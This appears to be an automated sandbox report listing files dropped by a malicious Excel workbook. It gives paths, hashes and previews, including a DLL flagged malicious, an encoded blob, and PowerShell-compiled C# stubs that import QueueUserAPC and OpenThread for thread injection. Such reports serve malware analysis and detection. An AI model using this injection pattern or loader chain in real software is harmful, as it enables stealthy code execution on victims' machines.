                                                                                                                                                            Preview: S2NeOGZQ1zFjFVs5ON9QMQuEBWS4N1Hd87YEwxYicRQ49H2zRAXy0j8uIyf/VPLfj03RA8s5Iqeg1s8z0iBpp0iVUbvXc68CxC7D68i97wD/ZQH13VLEFbrqiJkekS4KxkLA+JcDmt9OSvob8atdEJMP8QsbhrsXL9gogdS8M5NHxNayRjQft5WHeO1d8TVipXxJhMEQITjU/aOefS6OVpgP7DBXCQwBQZ1att5gSCaWSEInSqWAf2IX/eITwsWrQ6L1L63BmVgXGKI9Uk/+HuwpBDrieiavGCR6y94E6GxJBSdo1XgjdC8O+Z5+f4BskiRfkZEKSIj0y3rcEtsrgUNPKMYCabnqxBfJwzttR6EHk8e05iuum5ucFb5iMUiUP2nhX42GIbTo/FbwuCIHLx4LI3MiiWJRhRIFOoQTak93tUy4HQIvLAS6DIFXg2Nv8b+dyogBFjVwT1EA1hU/GAwLlLhuTQlnQz6k5fA6DOKLEO2n4+276Zm768CHxc8lDWcGy+PeZhcw/hJ5vpH+0uwRCnCVIa4x4oyUn1J0eim3VMKdmvxuyAkybCIHrbFbCmg4ZUfInRsVXoBLyhiRyanAYNL7Z6o1aGn7QGEtjsJrWzZOinnNz+pT4iJ11Vpr+Urt195nZIFt9h2ROfIRRHeex/0bl99wmGwnDcLYxCIKwCE+gY851NtKqlL5YrS+3GOju7tdxUlubShUK6kT6g5IJgP4gdD4lnjngIvbY1viSNHsE6i0gBK9Ta6fEAXHFg1nvk7DVYP7tHYUI2SokrtxzuSdvixM1I21DSQPyNXRK1+S7b3meimpgVtwf14pJKmQm0e4ZOy8CdUIgIBGcgcvMyB/aUr+5Lz2TYJybGxxuYtFktr1Vgohr18aPPPatMgZlPxAWni7ExdPofIAyOp0ygpJR8AGgN3rKLHEu5QO8C/WRu/nKP2BVvNTwnX3b0WVWXiy2eTOJ7F0eBUQqfc7HqLULyv7RC6/jJ7C
                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\app[1].dll
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):455680
                                                                                                                                                            Entropy (8bit):6.751938575699122
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12288:AmYDWUbdfyU+H93bJ3aBGQIuSR35F5VBpx:yBbdfJsJqBG5VB/
                                                                                                                                                            MD5:F3BE390B01C85970DEEAE124CA36CE2D
                                                                                                                                                            SHA1:93114ECF1B2C711EC10E1FAFDC834393EFC11A97
                                                                                                                                                            SHA-256:4EEF8B6A5BCD808CD0AB0E33EFCEA2C2F9A36ABE556E56556DE8550383C9D3CE
                                                                                                                                                            SHA-512:463829E0A07A2983D967483D49DD478243658C0BE583BCDDB801CD45BEB869EEE8CDA812EA3A74E5CF5D70BE07B5A59677317DBADCEFDB8A21DE3DDCBE7FA3A6
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S....z.X.z.X.z.XL..Y.z.XL..Y.z.XL..Y.z.X...Y.z.X...Y.z.X...Y6z.X..kX.z.X.z.Xcz.X...Y.z.X...Y.z.X...Y.z.XRich.z.X................PE..L......^...........!................7.....................................................@.................................@................................p...#......T........................... ...@............................................text............................... ..`.rdata..p...........................@..@.data...............................@....reloc...#...p...$..................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):89
                                                                                                                                                            Entropy (8bit):4.594574127566828
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:oVXUxKsMTRb8JOGXnExKsMTRwCn:o9U8rqE8gC
                                                                                                                                                            MD5:3D41A434776BF18F4210264D55425F2A
                                                                                                                                                            SHA1:FFF512CDEBF629DD6422C86A3EDA890EEA27C7E7
                                                                                                                                                            SHA-256:F3C52FF6CB2E9DF7C07F0C6EFA7335C1CF041183DFBFB07065597733554F4E7B
                                                                                                                                                            SHA-512:10BA8CCC4F234C64B9EBD807FACC2C2FFE7CA1D8CA82E5059BE5408738F9E92B18DD2B19DEEE9730D544CE40A005C0D95BACB095A77569C2931D42E4B9C6F45B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: [2021/07/08 15:47:34.648] Latest deploy version: ..[2021/07/08 15:47:34.648] 11.211.2 ..
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iu1bwi3u.hs4.psm1
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mqu4u5sp.pln.ps1
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfa1axxq.cvf.ps1
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xm5ssgy3.k4v.psm1
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:very short file (no magic)
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1
                                                                                                                                                            Entropy (8bit):0.0
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:U:U
                                                                                                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: 1
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.0.cs
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):396
                                                                                                                                                            Entropy (8bit):4.9841648897335995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:V/DsYLDS81zuJGa7mMRSR7a12P5JSSRa+rVSSRnA/fDDQy:V/DTLDfucaA3xv9rV5nA/HQy
                                                                                                                                                            MD5:AFB1799F1AEBC489A9583C7CF3EABC87
                                                                                                                                                            SHA1:BF47182925DED6BD7A35E2EA57C44C4B5D28CDAD
                                                                                                                                                            SHA-256:AF6E88061E474FF75EE21A0521844D64DE10EFF291A6D4C7AB4850D9166F0F98
                                                                                                                                                            SHA-512:9D9A5B9C8CD76E3F3C97B6060D5B3AD2129FFA34ECAF8C78559D53D25F749DF254A6872E878D8CE032B33B353804B3587DD7890EE5C10820E67EC0CF8676C5B2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class susrkisij. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr ajmlxynp,IntPtr pgoq,IntPtr qtbri);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint nrr,uint kxj,IntPtr rmmfwi);.. }..}.
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):369
                                                                                                                                                            Entropy (8bit):5.267867671414711
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fsXnsUzxs7+AEszIWXp+N23fsXn6:p37Lvkmb6KHUXnsUWZE8UXn6
                                                                                                                                                            MD5:CEEDB7C51F915816EBDA2EC610D66C71
                                                                                                                                                            SHA1:8237138597D4F9FB2EC14242EF6974D1366AFB76
                                                                                                                                                            SHA-256:31FFD039D190821F2C61A674FB875D083BCDE9631235376F81F5C27688583FFB
                                                                                                                                                            SHA-512:7101BEBFAFAF862A0F0341864802AA6B12DC7E5D5A95545C519838E79242BD941AF6A1D5B4E3D425ACC0403144D215A76F8DAFF24C676AA7847085693A210E26
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.0.cs"
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.out
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):454
                                                                                                                                                            Entropy (8bit):5.38028381091174
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fsXnsUzxs7+AEsz+:xKIR37Lvkmb6KHUXnsUWZE8UXnn
                                                                                                                                                            MD5:A14AD1BA111418248D596DB485C0A5FC
                                                                                                                                                            SHA1:8ED521CF791C4922C15B803DE64DC219897BC81E
                                                                                                                                                            SHA-256:306B8FCCFA6D2C04DD5493DF9EDA6695772DE2EEAD0DACC0274C07A27C749F57
                                                                                                                                                            SHA-512:032F5CAE351024E685DA3E47B0B50EA909F6C2580F6585173EC3669194C9B3BC3808419B15729613E7DA5EB2080D80EFB5617BEF749DEFA97C732CD67DDE91D9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.0.cs"......
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.0.cs
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):396
                                                                                                                                                            Entropy (8bit):4.9841648897335995
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:V/DsYLDS81zuJGa7mMRSR7a12P5JSSRa+rVSSRnA/fDDQy:V/DTLDfucaA3xv9rV5nA/HQy
                                                                                                                                                            MD5:AFB1799F1AEBC489A9583C7CF3EABC87
                                                                                                                                                            SHA1:BF47182925DED6BD7A35E2EA57C44C4B5D28CDAD
                                                                                                                                                            SHA-256:AF6E88061E474FF75EE21A0521844D64DE10EFF291A6D4C7AB4850D9166F0F98
                                                                                                                                                            SHA-512:9D9A5B9C8CD76E3F3C97B6060D5B3AD2129FFA34ECAF8C78559D53D25F749DF254A6872E878D8CE032B33B353804B3587DD7890EE5C10820E67EC0CF8676C5B2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class susrkisij. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr ajmlxynp,IntPtr pgoq,IntPtr qtbri);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint nrr,uint kxj,IntPtr rmmfwi);.. }..}.
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):369
                                                                                                                                                            Entropy (8bit):5.22358074629342
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fIT4x0zxs7+AEszIWXp+N23fIT4DH:p37Lvkmb6KHcWZE8ZHn
                                                                                                                                                            MD5:5861E4F177E993C70FC9E148D834D688
                                                                                                                                                            SHA1:7E787C9CA4A454AF88BAA1BE98083B81D08355F8
                                                                                                                                                            SHA-256:F7B8EEAB6FBB19C838CAFAEB2CDF6850ED1A190E840F6BA1146FDC7BEB813D38
                                                                                                                                                            SHA-512:CEA11D2A215E232AEB9A3BD6E37E5709E17F88DD0F8A5E7D95FB9EC42CB6AA853AC4E014D7C37CE3C190A5AB5B6FB5D123D06B8FFAE4545D704EB2CDB6E04462
                                                                                                                                                            Malicious:true
                                                                                                                                                            Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.0.cs"
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.out
                                                                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                                            Category:modified
                                                                                                                                                            Size (bytes):454
                                                                                                                                                            Entropy (8bit):5.360834939406208
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:6:IM7mLAA9VwRhMuAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fIT4x0zxs7+AEszO:xKIR37Lvkmb6KHcWZE8ZH+
                                                                                                                                                            MD5:2871DCAC841DB5BE9CE399BB6B760857
                                                                                                                                                            SHA1:23F0ACB68C09E4CFBA7C15567BEEEB67F2D3F69B
                                                                                                                                                            SHA-256:1856A0F7CA9DA06E3429B6730EABF243591BF467B9B86674777121858FF9211A
                                                                                                                                                            SHA-512:7A5047AED02EECE3FBE737EA84D20C2D5DC1F633166B2673DB716A4ECAD61D7DDBBEEA0771DBC22B49CCD5A073FAB9275657F63852FF39A7B04AB60B80E36BBD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.0.cs"......
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF2EB1C9CA29BD00CF.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):14245
                                                                                                                                                            Entropy (8bit):1.1113575184431475
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:kBqoIci6q01eTedvHX4xH28A6AQsq97qJlA:kBqoIci8D4NWA
                                                                                                                                                            MD5:C4B1F31EB96AEA043348A0005402FD3A
                                                                                                                                                            SHA1:068F3619FD0F74CA21221B3E2EBD54BB881BCB94
                                                                                                                                                            SHA-256:824ADFF0D18A52F9B8811BD5866ADD4F0855E6A03B77CF88C9A0479362650383
                                                                                                                                                            SHA-512:5B09B24F1B834FA33B04F2F647DDDEE7ED70C435D3AD11BA8AA886A8A12245B65029947AC8A1263458133CD9CD667CAEC2F469D2B2073502F2F233973B26CD8D
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF436C4ACF406520B7.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40169
                                                                                                                                                            Entropy (8bit):0.6758992421665342
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:kBqoxKAuvScS+bVHuVkrdTY5ArdTY5brdTY58:kBqoxKAuqR+bVHuVkNMANMbNM8
                                                                                                                                                            MD5:98FABC5D4AA9C8A1CBA8966AB226FC9B
                                                                                                                                                            SHA1:BFDCB96E44BDB4F82E60DD429C64A27B752A2793
                                                                                                                                                            SHA-256:119EA23EEBD7433269B0ED395AF2CE42551097E1EBA9F3D2099C42DBC30411AA
                                                                                                                                                            SHA-512:010B3CB1FF1AA3792060D12EC33D459779891F33B0AD57E46C0C6FA7AA5683D7C7E30EF89CCAD9E10C771849750D739500343B733F572488558321CE13F0379C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF4AB9BBFB5CFFE773.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40169
                                                                                                                                                            Entropy (8bit):0.6743248643482478
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:kBqoxKAuvScS+tzxQTmnXN2l9SonXN2l9SDnXN2l9Sk:kBqoxKAuqR+tzxQTmXUyoXUyDXUyk
                                                                                                                                                            MD5:5A19002C8E15DBFE531737D2D37682E6
                                                                                                                                                            SHA1:164D5BCBC8EB0C75690BAB805A8F24212895DEC3
                                                                                                                                                            SHA-256:938D4A4803DFA1AFA749995371F82B33F8F4F29E35F4286813A58519EF4EC730
                                                                                                                                                            SHA-512:5BA4841262E939567C13AAD0B23D34A9B2901588CAC01ABC00C06749D9195CB1D23E3D262F2A8896BCBFCEE645DB305260EBEC372CBEAD4F0E9B01D626C71BEE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF6208F46269C5D052.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40161
                                                                                                                                                            Entropy (8bit):0.6748703445699284
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:96:kBqoxKAuvScS+Z3lUXW59Fut1a59Fut1B59Fut1y:kBqoxKAuqR+Z3lUXW5W65Wh5WS
                                                                                                                                                            MD5:E487AA3B836E17916B59CC267C42DB1B
                                                                                                                                                            SHA1:C86717A0951ED79ADA5963B14400FD8ECA765143
                                                                                                                                                            SHA-256:B023CE9CD16C9C77AEF77219946915B75DB61F6DF56E91AF62186E4991F26201
                                                                                                                                                            SHA-512:2A4536492153EE64E21B624BF8FB05FEF7C8C669B29541F4F90DAC204C8C1D68DBF0C4C8CA6D77940739ACF539A24A5B9EEB436623655D97AD0975CCB562B0BD
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF903C43FA17F64456.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40217
                                                                                                                                                            Entropy (8bit):0.6824868847646752
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:384:kBqoxKAuqR+1bZILmn2AHnNbtjn2AHnNbt8n2AHnNbt5:d1HnN91HnNU1HnN3
                                                                                                                                                            MD5:55ED7624FEBCB3D4D10CFBB1FD665939
                                                                                                                                                            SHA1:83B6054B5096FD7EBABEEA53BE00C1B710676C66
                                                                                                                                                            SHA-256:60E9AEFBC296C12DA1CACF8C5B7B384BA22AEF36046A29931F558413B39993BC
                                                                                                                                                            SHA-512:C76288BD25AE9A3A286A0ACF71A821E0602381D0DEEE22371254E60F0589FC3A59D8DD2FD43070F130A302A7470A840E87CAECC5379C0E5BCBA0138E521A33E2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF97CC7EC2853BA6EC.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):12933
                                                                                                                                                            Entropy (8bit):0.4122061728840318
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:c9lLh9lLh9lIn9lIn9loNrF9loNR9lWNsrFsr5:kBqoIN6NENcFc5
                                                                                                                                                            MD5:87C19B0AB66776EC233AF2A84EC29542
                                                                                                                                                            SHA1:3AD7C158FDD12B3FCAC40EC1CFAB167397E10BA0
                                                                                                                                                            SHA-256:98BDB4F5B241F3CBF9E9E8FAFFFAE23365AFDB548E9C63DCA54F668FB45A6811
                                                                                                                                                            SHA-512:93FDEEB6A231F5BD105B18B33B564256DAD879096F0495F15A1914F1D2FEB68010779D3C53C329DE8E78D7277754ED3DB46CCA876ACA6EFD7513803F7519C648
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DF99BD870E81A4914B.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40169
                                                                                                                                                            Entropy (8bit):0.6727491699490233
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:kBqoxKAuqR+NTRwzGepzz6wepzz6Lepzz6M:kBqoxKAuqR+NTRwzGOHOwO9
                                                                                                                                                            MD5:926AA50F9B11397E3CB026AFA8F59655
                                                                                                                                                            SHA1:07358B1366A7A90477254B9B073E3D19C7959E6E
                                                                                                                                                            SHA-256:B9C313F4D5CCD3AB8DCB6373C9B65DAC432A8A7A557A31F0A5005A0B5ADFC7EB
                                                                                                                                                            SHA-512:534EA55B6C42AB0A5809BFB8E0528645CD3F2295BB075678036D113D6369A0DB04E165ED3A97B9635D94C741EBDD7E2EE3EBD36981B044E3526A76D742D69948
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\~DFA7B5BF1FB774EA36.TMP
                                                                                                                                                            Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):40185
                                                                                                                                                            Entropy (8bit):0.6770652307487162
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:192:kBqoxKAuqR+2wqDwpiUmCIiJviUmCIiJgiUmCIiJd:kBqoxKAuqR+2wqDwp3OiV3OiO3OiT
                                                                                                                                                            MD5:086E54865041FD1E00156F954E240361
                                                                                                                                                            SHA1:4A39E548815BDFAF58CBC642C295FF436C5152F2
                                                                                                                                                            SHA-256:524B452798FFB015874E19A35433B693FB1AA36C11B4871A4AD25CBD320C01DF
                                                                                                                                                            SHA-512:CA07CEB170C43046BC4E924E58F7416C9A3DF762ACDCC3CDEC3BCFF9BBBA50F05992D41321DC578F37CDC9FB742D9E0D531CDBD6B27A751A9E0D8B8279C39BB4
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                            C:\Users\user\Desktop\~$documentation_39236.xlsb
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                            File Type:data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):330
                                                                                                                                                            Entropy (8bit):1.6081032063576088
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:3:RFXI6dtBhFXI6dtt:RJZhJ1
                                                                                                                                                            MD5:836727206447D2C6B98C973E058460C9
                                                                                                                                                            SHA1:D83351CF6DE78FEDE0142DE5434F9217C4F285D2
                                                                                                                                                            SHA-256:D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41
                                                                                                                                                            SHA-512:7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607
                                                                                                                                                            Malicious:false
